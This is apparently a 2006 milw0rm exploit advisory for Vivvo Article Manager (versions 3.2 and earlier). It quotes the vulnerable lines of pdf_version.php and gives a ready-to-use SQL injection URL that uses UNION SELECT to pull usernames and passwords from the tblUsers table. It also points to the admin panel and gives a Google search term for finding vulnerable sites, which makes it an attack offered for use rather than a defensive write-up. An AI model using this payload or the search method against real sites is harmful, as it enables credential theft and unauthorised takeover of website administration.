24 lines
No EOL
1.2 KiB
Text
24 lines
No EOL
1.2 KiB
Text
############################################################
|
|
#MercilessTurk info@kahramanhost.com
|
|
############################################################
|
|
#App Name: phpWordPress (Vivvo Article Manager)
|
|
#App Author: vivvo.net
|
|
#App Version: <=3.2
|
|
############################################################
|
|
#Vulnerable Code in pdf_version.php :
|
|
#line 19: $aid=secure_sql($_GET['id']);
|
|
#line 20: $query="SELECT * from tblArticles where id=$aid";
|
|
#secure_sql function doesn't block all sql injection attacks.
|
|
############################################################
|
|
#You will need a pdf reader.
|
|
#SQL Injection String:
|
|
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
|
|
############################################################
|
|
#Admin Panel:http://[target]/[path]/admin
|
|
############################################################
|
|
#For google searching:Vivvo Article Manager
|
|
############################################################
|
|
#Greetz: sanaldarbe.com members.
|
|
############################################################
|
|
|
|
# milw0rm.com [2006-09-09] |